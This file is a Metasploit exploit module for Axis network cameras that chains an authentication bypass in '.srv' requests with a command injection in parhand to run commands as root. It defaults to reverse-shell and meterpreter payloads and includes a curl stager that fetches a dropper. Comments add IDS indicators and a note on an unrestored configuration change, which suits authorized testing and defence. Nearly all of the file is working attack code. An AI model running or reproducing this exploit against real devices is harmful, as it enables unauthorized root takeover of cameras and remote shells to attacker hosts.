Path: blob/master/modules/exploits/linux/http/axis_srv_parhand_rce.rb
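##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Metasploit module for the Axis network camera issues tracked as
# CVE-2018-10660, CVE-2018-10661 and CVE-2018-10662 (see 'References').
#
# Per the module description, an authentication bypass in the `.srv` request
# handling is combined with a command injection in parhand, which yields
# command execution as root.
#
# What this module puts on the wire, as visible in the code below:
# * a GET (check) or POST (execute_command) to `/index.html/<random>.srv`,
#   where `<random>` is 8 to 42 alphanumeric characters;
# * POST bodies carrying `action=dbus` and an `args` value addressed to
#   `com.axis.PolicyKitParhand`.
# Both are usable as log and IDS indicators. The vendor advisory listed in
# 'References' is the source for fixed firmware versions.
class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  # Registers module metadata, targets and default options.
  #
  # @param info [Hash] caller-supplied metadata merged in through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Axis Network Camera .srv-to-parhand RCE',
        'Description' => %q{
          This module exploits an auth bypass in .srv functionality and a
          command injection in parhand to execute code as the root user.
        },
        'Author' => [
          'Or Peles', # Vulnerability discovery (VDOO)
          'wvu', # Metasploit module
          'sinn3r', # Metasploit module
          'Brent Cook', # Metasploit module
          'Jacob Robles', # Metasploit module
          'Matthew Kienow', # Metasploit module
          'Shelby Pace', # Metasploit module
          'Chris Lee', # Metasploit module
          'Cale Black' # Metasploit module
        ],
        'References' => [
          ['CVE', '2018-10660'],
          ['CVE', '2018-10661'],
          ['CVE', '2018-10662'],
          ['URL', 'https://blog.vdoo.com/2018/06/18/vdoo-discovers-significant-vulnerabilities-in-axis-cameras/'],
          ['URL', 'https://www.axis.com/files/faq/Advisory_ACV-128401.pdf']
        ],
        'DisclosureDate' => '2018-06-18',
        'License' => MSF_LICENSE,
        'Privileged' => true,
        'Targets' => [
          [
            'Unix In-Memory',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_memory,
              'Payload' => {
                # A literal space is declared a bad character and the cmd/ifs
                # encoder is selected for this target.
                'BadChars' => ' ',
                'Encoder' => 'cmd/ifs',
                'Compat' => {
                  'PayloadType' => 'cmd',
                  'RequiredCmd' => 'netcat-e'
                }
              },
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
              }
            }
          ],
          [
            'Linux Dropper',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_ARMLE,
              'Type' => :linux_dropper,
              'DefaultOptions' => {
                'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'
              }
            }
          ]
        ],
        'DefaultTarget' => 1,
        'DefaultOptions' => { 'WfsDelay' => 10 },
        # NOTE(review): all three values are still placeholders. execute_command
        # writes the device parameter root.Time.DST.Enabled and nothing in this
        # file restores it, so a configuration-change side effect looks likely;
        # confirm on a test device and record the real values so an operator
        # knows what state the camera is left in.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Probes the target with a single unauthenticated GET for a randomly named
  # `.srv` path under /index.html.
  #
  # @return [Msf::Exploit::CheckCode] Appears when the device answers 204,
  #   Unknown when no response was received, Safe for any other response
  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => "/index.html/#{rand_srv}"
    )

    # No response means the device was never assessed (unreachable, timeout,
    # wrong port). Reporting Safe in that case would be a false negative in a
    # vulnerability sweep, so it is reported as Unknown instead.
    return CheckCode::Unknown unless res

    return CheckCode::Appears if res.code == 204

    CheckCode::Safe
  end

  # Dispatches on the selected target type: the in-memory target sends the
  # encoded command payload directly, the dropper target goes through the
  # command stager (curl flavor, with nospace set).
  def exploit
    case target['Type']
    when :unix_memory
      execute_command(payload.encoded)
    when :linux_dropper
      execute_cmdstager(flavor: :curl, nospace: true)
    end
  end

  # Sends the two POST requests that carry one command.
  #
  # The first request calls SetParameter with a value for
  # root.Time.DST.Enabled that embeds +cmd+; the second calls
  # SynchParameters. Presumably the second call is what makes parhand act on
  # the stored value; confirm against the VDOO write-up in 'References'.
  # Neither response is inspected.
  #
  # @param cmd [String] command string embedded in the parameter value
  # @param _opts [Hash] unused; accepted because the command stager passes options
  def execute_command(cmd, _opts = {})
    send_request_cgi(
      'method' => 'POST',
      'uri' => "/index.html/#{rand_srv}",
      'vars_post' => {
        'action' => 'dbus',
        'args' => dbus_send(
          method: :set_param,
          param: "string:root.Time.DST.Enabled string:;(#{cmd})&"
        )
      }
    )

    send_request_cgi(
      'method' => 'POST',
      'uri' => "/index.html/#{rand_srv}",
      'vars_post' => {
        'action' => 'dbus',
        'args' => dbus_send(method: :synch_params)
      }
    )
  end

  # Builds the argument string sent in the `args` POST field.
  #
  # @param method [Symbol] :set_param or :synch_params
  # @param param [String, nil] arguments appended after SetParameter; only
  #   used for :set_param
  # @return [String] bus selection, destination and object path followed by
  #   the chosen method name
  # @raise [TypeError] for any other +method+, because the case expression
  #   then yields nil and nil cannot be appended to a String
  def dbus_send(method:, param: nil)
    args = '--system --dest=com.axis.PolicyKitParhand ' \
           '--type=method_call /com/axis/PolicyKitParhand '

    args <<
      case method
      when :set_param
        "com.axis.PolicyKitParhand.SetParameter #{param}"
      when :synch_params
        'com.axis.PolicyKitParhand.SynchParameters'
      end

    args
  end

  # Returns a fresh random file name of 8 to 42 alphanumeric characters with
  # a `.srv` extension; every request in this module uses a new one.
  #
  # @return [String]
  def rand_srv
    "#{Rex::Text.rand_text_alphanumeric(8..42)}.srv"
  end

end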